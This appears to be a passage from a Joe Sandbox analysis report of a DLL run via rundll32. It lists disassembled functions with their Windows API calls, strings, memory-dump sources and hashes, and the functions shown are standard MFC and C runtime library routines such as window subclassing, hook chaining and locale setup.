                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10028DEC, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10028DF6
                                                                                                            • Part of subcall function 1002B0BB: __EH_prolog3.LIBCMT ref: 1002B0C2
                                                                                                          • CallNextHookEx.USER32 ref: 10028E3A
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          • GetClassLongA.USER32 ref: 10028E7E
                                                                                                          • GlobalGetAtomNameA.KERNEL32 ref: 10028EA8
                                                                                                          • SetWindowLongA.USER32 ref: 10028EFD
                                                                                                          • _memset.LIBCMT ref: 10028F47
                                                                                                          • GetClassLongA.USER32 ref: 10028F77
                                                                                                          • GetClassNameA.USER32(?,?,00000100), ref: 10028F98
                                                                                                          • GetWindowLongA.USER32 ref: 10028FBC
                                                                                                          • GetPropA.USER32 ref: 10028FD6
                                                                                                          • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 10028FE1
                                                                                                          • GetPropA.USER32 ref: 10028FE9
                                                                                                          • GlobalAddAtomA.KERNEL32 ref: 10028FF1
                                                                                                          • SetWindowLongA.USER32 ref: 10028FFF
                                                                                                          • CallNextHookEx.USER32 ref: 10029017
                                                                                                          • UnhookWindowsHookEx.USER32(?), ref: 1002902B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                          • String ID: #32768$AfxOldWndProc423$ime
                                                                                                          • API String ID: 867647115-4034971020
                                                                                                          • Opcode ID: 028737d45415cf4fc653e4401d117fb93ecf855678ad16e5d4e8c367e2bfe641
                                                                                                          • Instruction ID: c9f41a1409c6bb8d0fa3b18bb25e3997143979ac063bd30542687b89172f9a1c
                                                                                                          • Opcode Fuzzy Hash: 028737d45415cf4fc653e4401d117fb93ecf855678ad16e5d4e8c367e2bfe641
                                                                                                          • Instruction Fuzzy Hash: 2361027590122AAFDB11DF61DD88B9E7BB8FF093A1F920154F509E6191DB30DE80CBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100214CB, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 100214D5
                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                                                                                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
                                                                                                          • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,Function_00020C25,?), ref: 100215EA
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
                                                                                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
                                                                                                          • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                                                                                                          • _memset.LIBCMT ref: 10021689
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                                                                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                          • API String ID: 3537336938-2299501126
                                                                                                          • Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
                                                                                                          • Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
                                                                                                          • Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
                                                                                                          • Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10024F5B, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,100250B0,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024F86
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 10024FA2
                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 10024FB3
                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10024FC4
                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10024FD5
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10024FE6
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10024FF7
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10025008
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                          • API String ID: 667068680-68207542
                                                                                                          • Opcode ID: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
                                                                                                          • Instruction ID: f18cf552d00ebf4573e19fd52f8b2344fe61d2491b1b7e62cf44cba2888c0d7d
                                                                                                          • Opcode Fuzzy Hash: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
                                                                                                          • Instruction Fuzzy Hash: 15213672D10170ABE752EF749DC886D7AF8F64C2827A1083FE302DA12AD7724540DF98
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10026EFC, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB
                                                                                                          • GetParent.USER32(?), ref: 10026F2B
                                                                                                          • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 10026F4E
                                                                                                          • GetWindowRect.USER32 ref: 10026F68
                                                                                                          • GetWindowLongA.USER32 ref: 10026F7E
                                                                                                          • CopyRect.USER32 ref: 10026FCB
                                                                                                          • CopyRect.USER32 ref: 10026FD5
                                                                                                          • GetWindowRect.USER32 ref: 10026FDE
                                                                                                          • CopyRect.USER32 ref: 10026FFA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                          • String ID: (
                                                                                                          • API String ID: 808654186-3887548279
                                                                                                          • Opcode ID: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
                                                                                                          • Instruction ID: 79398ab63d643b80669917eeb3518c0a7ae9ea55fdc53564aac6bb8538d6af80
                                                                                                          • Opcode Fuzzy Hash: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
                                                                                                          • Instruction Fuzzy Hash: 08513C72900219AFDB01CBA8EE85AEEBBB9FF48350F554125F909F3251DB30ED458B64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10034610, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
                                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 1003462D
                                                                                                            • Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
                                                                                                            • Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671
                                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10034656
                                                                                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 10034666
                                                                                                          • __lock.LIBCMT ref: 10034688
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 10034695
                                                                                                          • __lock.LIBCMT ref: 100346A9
                                                                                                          • ___addlocaleref.LIBCMT ref: 100346C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                          • API String ID: 1028249917-2843748187
                                                                                                          • Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                                                                                                          • Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
                                                                                                          • Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                                                                                                          • Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10020C3F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
                                                                                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
                                                                                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                          • API String ID: 667068680-3617302793
                                                                                                          • Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                                                                                                          • Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
                                                                                                          • Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                                                                                                          • Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043A65, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043A6C
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 10043A76
                                                                                                          • int.LIBCPMT ref: 10043A8D
                                                                                                            • Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6
                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 10043A96
                                                                                                          • ctype.LIBCPMT ref: 10043AB0
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043AC4
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043AD2
                                                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 10043AE2
                                                                                                          • std::locale::facet::facet_Register.LIBCPMT ref: 10043AE8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                          • String ID: bad cast
                                                                                                          • API String ID: 2535038987-3145022300
                                                                                                          • Opcode ID: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
                                                                                                          • Instruction ID: 41e516e335ea381e6c6cf3992b6e31462ccd823a1db2d0b16548d00875c41f3f
                                                                                                          • Opcode Fuzzy Hash: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
                                                                                                          • Instruction Fuzzy Hash: 7E01C039D401699BCB02DBA4DC42AEE7375FF84760F724129F110EB1D1DF74AA008799
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043C84, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043C8B
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 10043C95
                                                                                                          • int.LIBCPMT ref: 10043CAC
                                                                                                            • Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6
                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 10043CB5
                                                                                                          • codecvt.LIBCPMT ref: 10043CCF
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043CE3
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043CF1
                                                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 10043D01
                                                                                                          • std::locale::facet::facet_Register.LIBCPMT ref: 10043D07
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                          • String ID: bad cast
                                                                                                          • API String ID: 577375395-3145022300
                                                                                                          • Opcode ID: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
                                                                                                          • Instruction ID: 1c641b6faa081a6f5f4558330d18bfb7172afe5efef557fc2d9691916cc6be6c
                                                                                                          • Opcode Fuzzy Hash: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
                                                                                                          • Instruction Fuzzy Hash: E701A979D002199BCB06DBA0DC42AAE7375FF84660FB14129F111FB1E1DF74AA008798
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002341C, Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10023423
                                                                                                          • FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 1002345E
                                                                                                            • Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C
                                                                                                          • LockResource.KERNEL32(?,00000024,1000150C,00000000,4463D444), ref: 1002346F
                                                                                                          • GetDesktopWindow.USER32 ref: 100234A2
                                                                                                          • IsWindowEnabled.USER32(?), ref: 100234B0
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 100234BF
                                                                                                            • Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B
                                                                                                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                                                                                                          • GetActiveWindow.USER32 ref: 100235AF
                                                                                                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,4463D444), ref: 100235BD
                                                                                                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,4463D444), ref: 100235D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 964565984-0
                                                                                                          • Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                                                                                                          • Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
                                                                                                          • Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                                                                                                          • Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10028C9F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                                                                                                          • String ID: AfxOldWndProc423
                                                                                                          • API String ID: 2109165785-1060338832
                                                                                                          • Opcode ID: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
                                                                                                          • Instruction ID: ff35111d89a6fae3ee79e979b08ab4de06e021ef9fe06013c3cb9f10e1bb71d8
                                                                                                          • Opcode Fuzzy Hash: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
                                                                                                          • Instruction Fuzzy Hash: FB31843A80111ABBDF02DFA0EE49DBF7BB8FF46341F800519FA05A50A1C7759A14DBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B9A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetStockObject.GDI32(00000011), ref: 1002B9C8
                                                                                                          • GetStockObject.GDI32(0000000D), ref: 1002B9D0
                                                                                                          • GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
                                                                                                          • GetDC.USER32(00000000), ref: 1002B9EC
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
                                                                                                          • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
                                                                                                          • ReleaseDC.USER32 ref: 1002BA18
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$Stock$CapsDeviceRelease
                                                                                                          • String ID: System
                                                                                                          • API String ID: 46613423-3470857405
                                                                                                          • Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                                                                                                          • Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
                                                                                                          • Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
